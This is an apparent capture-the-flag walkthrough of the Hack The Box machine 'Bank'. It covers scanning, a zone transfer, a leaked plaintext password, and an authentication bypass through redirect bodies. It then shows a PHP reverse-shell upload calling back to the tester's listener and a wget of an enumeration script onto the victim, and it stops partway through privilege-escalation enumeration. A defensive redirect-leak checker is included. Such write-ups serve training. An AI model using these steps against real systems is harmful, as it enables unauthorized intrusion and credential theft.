Bank
Port scans
root@kali:~/HTB/Machines/Bank# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.29 --rate=1000

Starting masscan 1.0.5 at 2019-11-18 04:54:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.29
Discovered open port 53/udp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 53/tcp on 10.10.10.29
Nmap
root@kali:~/HTB/Machines/Bank# nmap -A -T4 -v 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:54 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating Ping Scan at 23:54
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 23:54, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:54
Scanning bank.htb (10.10.10.29) [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Completed SYN Stealth Scan at 23:54, 0.62s elapsed (1000 total ports)
Initiating Service scan at 23:54
Scanning 3 services on bank.htb (10.10.10.29)
Completed Service scan at 23:54, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
Retrying OS detection (try #2) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
Initiating Traceroute at 23:54
Completed Traceroute at 23:54, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:54
Completed Parallel DNS resolution of 2 hosts. at 23:54, 0.19s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 23:54
Completed NSE at 23:54, 8.24s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.16s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.038s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: HTB Bank - Login
|_Requested resource was login.php
Aggressive OS guesses: Linux 3.13 (94%), Linux 3.2 - 4.9 (94%), Linux 3.16 (93%), Linux 3.18 (93%), Linux 4.2 (93%), Linux 4.8 (93%), Linux 4.9 (93%), Crestron XPanel control system (93%), ASUS RT-N56U WAP (Linux 3.4) (92%), Linux 3.12 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 199.637 days (since Thu May  2 09:36:43 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   37.42 ms 10.10.14.1
2   37.55 ms bank.htb (10.10.10.29)

NSE: Script Post-scanning.
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds
           Raw packets sent: 1115 (54.068KB) | Rcvd: 2543 (103.658KB)
Vulnerabilities scan
root@kali:~/HTB/Machines/Bank# nmap -p 22,53,80 --script vuln 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:56 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.037s latency).

PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open  domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bank.htb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://bank.htb:80/
|     Form id: 
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|_  /inc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 345.44 seconds
The only vulnerability reported is a denial of service (Slowloris), which is not useful here.
DNS enumeration
root@kali:~/HTB/Machines/Bank# dig @10.10.10.29 axfr bank.htb

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> @10.10.10.29 axfr bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.		604800	IN	NS	ns.bank.htb.
bank.htb.		604800	IN	A	10.10.10.29
ns.bank.htb.		604800	IN	A	10.10.10.29
www.bank.htb.		604800	IN	CNAME	bank.htb.
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 38 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Mon Nov 18 00:36:13 EST 2019
;; XFR size: 6 records (messages 1, bytes 171)
Zone transfers are allowed, and the SOA record contains the administrator email (chris.bank.htb, i.e. chris@bank.htb). That looks like a good hint. The zone also confirms that the web page is hosted at bank.htb.
Web enumeration
The web page at http://bank.htb shows a login page.
And Wappalyzer shows PHP technology.
root@kali:~/HTB/Machines/Bank# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://bank.htb

Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_11-41-22.log

Target: http://bank.htb

[11:41:22] Starting: 
[11:41:24] 403 -  281B  - /icons/
[11:41:25] 302 -    3KB - /support.php  ->  login.php
[11:41:25] 403 -  283B  - /uploads/
[11:41:25] 302 -    7KB - /index.php  ->  login.php
[11:41:25] 403 -  279B  - /.php
[11:41:26] 200 -    2KB - /login.php
[11:41:27] 200 -    2KB - /assets/
[11:41:33] 302 -    0B  - /logout.php  ->  index.php
[11:41:42] 200 -    1KB - /inc/
[11:54:25] 403 -  289B  - /server-status/
[12:07:52] 200 -  248KB - /balance-transfer/

Task Completed
The enumeration finds several PHP pages and an interesting folder, balance-transfer. A second point: the pages index.php and support.php redirect to login.php, but their response sizes (7 kB and 3 kB) are far too big for a simple redirect, which normally has an empty or one-line body.
Web page analysis
index.php
root@kali:~# curl -v http://bank.htb/index.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:27:50 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="q4m77li6rp2gq91so2a0mhf1i2" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=q4m77li6rp2gq91so2a0mhf1i2; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 7322
< Content-Type: text/html
< 
<div class="col-md-10"> <br> <div class="row"> <div class="col-lg-3 col-md-6"> <div class="panel panel-primary"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-usd fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;"> $</div> <div>Balance</div> </div> </div> </div> </div> </div>
<div class="col-lg-3 col-md-6"> <div class="panel panel-yellow"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-shopping-cart fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">8</div> <div>Total Transactions</div> </div> </div> </div> </div> </div>
<div class="col-lg-3 col-md-6"> <div class="panel panel-green"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-credit-card fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">0</div> <div>Total CreditCards</div> </div> </div> </div> </div> </div>
<div class="col-lg-3 col-md-6"> <div class="panel panel-red"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-support fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">0</div> <div>Support Tickets</div> </div> </div> </div> </div> </div> </div> <!-- /.row -->
<div class=""> <div class="panel panel-default"> <div class="panel-heading"> <h3 style="font-size: 20px;"><i class="fa fa-credit-card fa-fw"></i> CreditCard Information</h3> </div> <div class="panel-body"> <div class="table-responsive"> <table class="table table-bordered table-hover table-striped"> <thead> <tr> <th>Card Type</th> <th>Card Number</th> <th>Card Exp Date</th> <th>CVV</th> <th>Balance</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div>
<div class=""> <div class="panel panel-default"> <div class="panel-heading"> <h3 style="font-size: 20px;"><i class="fa fa-money fa-fw"></i> Transaction History</h3> </div> <div class="panel-body"> <div class="table-responsive"> <table class="table table-bordered table-hover table-striped"> <thead> <tr> <th>Transaction ID</th> <th>Transaction Date</th> <th>Transaction Time</th> <th>Amount (USD)</th> </tr> </thead> <tbody>
<tr> <td>3326</td> <td>10/21/2016</td> <td>3:29 PM</td> <td>$321.33</td> </tr>
<tr> <td>3325</td> <td>10/21/2016</td> <td>3:20 PM</td> <td>$234.34</td> </tr>
<tr> <td>3324</td> <td>10/21/2016</td> <td>3:03 PM</td> <td>$724.17</td> </tr>
<tr> <td>3323</td> <td>10/21/2016</td> <td>3:00 PM</td> <td>$23.71</td> </tr>
<tr> <td>3322</td> <td>10/21/2016</td> <td>2:49 PM</td> <td>$8345.23</td> </tr>
<tr> <td>3321</td> <td>10/21/2016</td> <td>2:23 PM</td> <td>$245.12</td> </tr>
<tr> <td>3320</td> <td>10/21/2016</td> <td>2:15 PM</td> <td>$5663.54</td> </tr>
<tr> <td>3319</td> <td>10/21/2016</td> <td>2:13 PM</td> <td>$943.45</td> </tr>
</tbody> </table> </div> </div> </div> </div> <!-- /.row --> </div> <br> </div> <!-- /.container-fluid --> </div> <!-- /#page-wrapper --> <br> </div> <!-- /#wrapper --> <br>
<!-- jQuery --> <script src="./assets/js/jquery.js"></script> <br>
<!-- Bootstrap Core JavaScript --> <script src="./assets/js/bootstrap.min.js"></script> <br>
<!-- Morris Charts JavaScript --> <script src="./assets/js/plugins/morris/raphael.min.js"></script> <script src="./assets/js/plugins/morris/morris.min.js"></script> <script src="./assets/js/plugins/morris/morris-data.js"></script> <br>
<!-- SweetAlert --> <script src="./assets/js/sweetalert.min.js"></script> <br> </body> <br> </html>
* Connection #0 to host bank.htb left intact
The response is a 302 redirect to login.php, but index.php renders and sends the page content along with the redirect. This is a vulnerability: a browser follows the redirect and hides the body, but anyone reading the raw response sees application data (balance, transaction history) without being authenticated.
support.php
root@kali:~# curl -v http://bank.htb/support.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /support.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:31:04 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="afsdndhrkur5j9mpginc2se6t1" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=afsdndhrkur5j9mpginc2se6t1; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 3291
< Content-Type: text/html
< 
<br> <div class="col-sm-5"> <div class="panel panel-primary"> <div class="panel-heading"> <h3 style="font-size: 20px;">My Tickets</h3> </div> <div class="panel-body"> <div class="content-box-large"> <div class="panel-body"> <table class="table table-bordered"> <thead> <tr> <th>#</th> <th>Title</th> <th>Message</th> <th>Attachment</th> <th>Actions</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> </div>
<!-- New Ticket --> <div class="col-sm-5"> <section class="panel"> <br> <div class="panel-body"> <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data"> <br> <label>Title</label> <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;"> <br> <br> <label>Message</label> <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea> <br>
<div style="position:relative;"> <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] --> <a class='btn btn-primary' href='javascript:;'> Choose File... <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40" onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'> </a> <span class='label label-info' id="upload-file-info"></span> </div> <br>
<button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with="<div class="loading-o" style="padding: 7px 21px;"></div>">Submit</button> </form> <br> </div> <br> </section> <br> </div> <br> </div> <!-- /#page-wrapper --> <br> </div> <!-- /#wrapper --> <br>
<!-- jQuery --> <script src="./assets/js/jquery.js"></script> <br>
<!-- Bootstrap Core JavaScript --> <script src="./assets/js/bootstrap.min.js"></script> <br>
<!-- Morris Charts JavaScript --> <script src="./assets/js/plugins/morris/raphael.min.js"></script> <script src="./assets/js/plugins/morris/morris.min.js"></script> <script src="./assets/js/plugins/morris/morris-data.js"></script> <br>
<!-- SweetAlert --> <script src="./assets/js/sweetalert.min.js"></script> <br> </body> <br> </html>
* Connection #0 to host bank.htb left intact
Again, the page content is sent along with the redirect. In this case it contains a form that allows file uploads. More important, the debug comment indicates that files with the .htb extension are executed as PHP.
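The symptom seen on index.php and support.php (a 302 whose body is several kilobytes) can be checked mechanically. The following is an added example, not part of the original write-up: it parses raw HTTP responses and flags redirects that still carry page content. The sample responses are constructed to mirror the curl and dirsearch output above (shortened HTML, placeholder cookie); the function names and the 512-byte threshold are my own choices.

```python
"""Flag 3xx redirects that still carry page content in the body.

Added example, not part of the original write-up. In PHP a redirect must be
header('Location: login.php'); followed by exit; when the exit is missing, the
rest of the page is rendered into the body and sent with the 302, which is
what index.php and support.php do on this machine.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# A real redirect body is empty or a one-line "Moved" notice; anything bigger is suspect.
LEAK_THRESHOLD_BYTES = 512


@dataclass
class Finding:
    path: str
    status: int
    location: Optional[str]
    body_bytes: int
    leaks: bool


def build_response(status_line: str, headers: Dict[str, str], body: str) -> str:
    """Assemble a raw HTTP/1.1 response; only used to construct the samples below."""
    hdrs = dict(headers)
    hdrs["Content-Length"] = str(len(body.encode()))
    head = "\r\n".join(f"{k}: {v}" for k, v in hdrs.items())
    return f"{status_line}\r\n{head}\r\n\r\n{body}"


def parse_response(raw: str):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Header names are case-insensitive; Apache sent "location" in lower case.
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def check_redirect(path: str, raw: str, threshold: int = LEAK_THRESHOLD_BYTES) -> Finding:
    """A 3xx with a Location header and a non-trivial body is a content leak."""
    status, headers, body = parse_response(raw)
    body_bytes = len(body.encode())
    is_redirect = 300 <= status < 400 and "location" in headers
    return Finding(path, status, headers.get("location"), body_bytes,
                   is_redirect and body_bytes > threshold)


def leaking_paths(responses: Dict[str, str]) -> List[str]:
    """Return the paths whose redirect response leaks content."""
    return [p for p, raw in responses.items() if check_redirect(p, raw).leaks]


# Constructed samples modelled on the write-up's curl and dirsearch output; not real captures.
_REDIRECT_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.21",
    "Set-Cookie": "HTBBankAuth=constructedsessionid; path=/",
    "location": "login.php",
    "Content-Type": "text/html",
}
_DASHBOARD_HTML = (
    "<div>Balance</div><h3>Transaction History</h3><table>"
    "<tr><th>Transaction ID</th><th>Transaction Date</th><th>Amount (USD)</th></tr>"
    + "".join(f"<tr><td>{3319 + i}</td><td>10/21/2016</td><td>$321.33</td></tr>" for i in range(8))
    + "</table>"
)

SAMPLE_RESPONSES = {
    "/index.php": build_response("HTTP/1.1 302 Found", _REDIRECT_HEADERS, _DASHBOARD_HTML),
    "/logout.php": build_response("HTTP/1.1 302 Found",
                                  {**_REDIRECT_HEADERS, "location": "index.php"}, ""),
    "/login.php": build_response("HTTP/1.1 200 OK",
                                 {"Content-Type": "text/html"}, "<form>" + "x" * 2000 + "</form>"),
}

if __name__ == "__main__":
    for path, raw in SAMPLE_RESPONSES.items():
        print(check_redirect(path, raw))
    print("leaking:", leaking_paths(SAMPLE_RESPONSES))
```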
Folder balance-transfer
There are a bunch of files, but the content is encrypted.
Download of files from balance-transfer
root@kali:~/HTB/Machines/Bank/balance-transfer# wget -r http://bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer# cd bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# ls -l *.acc | wc -l
999
There are nearly a thousand files, and finding something interesting among them is like looking for a needle in a haystack. But I remembered the email from the DNS enumeration, and bingo:
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# grep chris@bank.htb *.acc
68576f20e9732f1b2edc4df5b8533230.acc:Email: chris@bank.htb
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
Access to the application
With this user and password we can log in to the application.
The support page allows file upload.
Creation of php reverse shell
root@kali:~/HTB/Machines/Bank# cp /usr/share/webshells/php/php-reverse-shell.php ./

Update the parameters of the reverse shell:

root@kali:~/HTB/Machines/Bank# grep CHANGE php-reverse-shell.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
Run listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444
Upload file to support page
But the upload fails.
Rename of the reverse shell with htb extension
Because of the debug comment on the support page, I renamed the file with the .htb extension.
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
This time it works and the file is uploaded.
Open the reverse shell
root@kali:~/HTB/Machines/Bank# curl http://bank.htb/uploads/php-reverse-shell.htb
And on the listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34304.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 04:52:21 up  2:12,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg
rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen
Alternative way to gain the reverse shell without the user and password
As noted before, the web application sends the HTML body together with the redirect. We can use this coding mistake to upload a file through the support page without authentication.
Setup Burp suite
We want to limit interception to traffic to and from the machine bank.htb, and we also want to intercept the responses.
Access the form
Send the request for the page support.php.
When the response comes back, we see that the server answers 302 (redirect) and that the Location header points to the page login.php.
The response is modified before it reaches the browser: the status is changed to 200 OK and the Location header is removed.
The form appears in the browser.
Upload the file
Fill in the form with the reverse shell file and submit it.
Forward the request.
Modify the response to 200 OK and remove the Location header.
The file is uploaded to the server.
Start the listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Open the reverse shell
And the reverse shell is opened.
root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34114.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 06:13:32 up 22 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg
rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen
User flag
www-data@bank:/$ cat /home/chris/user.txt
cat /home/chris/user.txt
<USER_FLAG>
User escalation
Download the script LinEnum.sh
root@kali:~/HTB/Machines/Bank# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
To upload the file to the server, I start a local web server.
root@kali:~/HTB/Machines/Bank# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
And the script is downloaded on the victim.
www-data@bank:/$ cd /tmp
cd /tmp
www-data@bank:/tmp$ wget http://10.10.14.34/LinEnum.sh
wget http://10.10.14.34/LinEnum.sh
--2019-11-18 17:35:36--  http://10.10.14.34/LinEnum.sh
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46108 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'

100%[======================================>] 46,108      --.-K/s   in 0.09

2019-11-18 17:35:36 (494 KB/s) - 'LinEnum.sh' saved [46108/46108]

www-data@bank:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
Run enumeration script
www-data@bank:/tmp$ ./LinEnum.sh -r linenum -e /tmp/ -t
I copy the report to my machine to read it more easily.
www-data@bank:/tmp$ scp -r linenum-18-11-19 LinEnum-export-18-11-19/ root@10.10.14.34:/root/HTB/Machines/Bank/linenum/
Useful information from the Linux enumeration
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
The file /var/www/bank/bankreports.txt
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root  root  4.0K May 28  2017 .
drwxr-xr-x 22 root  root  4.0K Dec 24  2017 ..
drwxr-xr-x  3 chris chris 4.0K Jun 14  2017 chris

[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1252 May 28  2017 /etc/passwd

[-] Root is allowed to login via SSH:
PermitRootLogin yes

[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3

[-] Apache version:
Server version: Apache/2.4.7 (Ubuntu)
Server built:   May  9 2017 16:13:38

[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root   1252 May 28  2017 /etc/passwd
-rw-r--r-- 1 root root    707 May 28  2017 /etc/group
-rw-r--r-- 1 root root    665 Feb 20  2014 /etc/profile
-rw-r----- 1 root shadow  895 Jun 14  2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency
File /var/www/bank/bankreports.txt
I missed it because I didn't add the txt extension to my web enumeration :(. In this file the user and password are in clear text too.
root@kali:~/HTB/Machines/Bank# curl bank.htb/bankreports.txt
+=================+
| HTB Bank Report |
+=================+

===Users===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 2
Transactions: 8
Balance: 1.337$
Permissions on /home directories are lax
As already seen, we do not need to escalate to the user chris to capture the user flag.
/etc/passwd is writable
This gives an easy way to escalate privileges.
/var/htb/bin/emergency
This file has the SUID bit set and is owned by root, so it runs with root privileges. It looks interesting.
www-data@bank:/tmp$ file /var/htb/bin/emergency
file /var/htb/bin/emergency
/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
This file could also have been found by searching for SUID files manually.
www-data@bank:/tmp$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
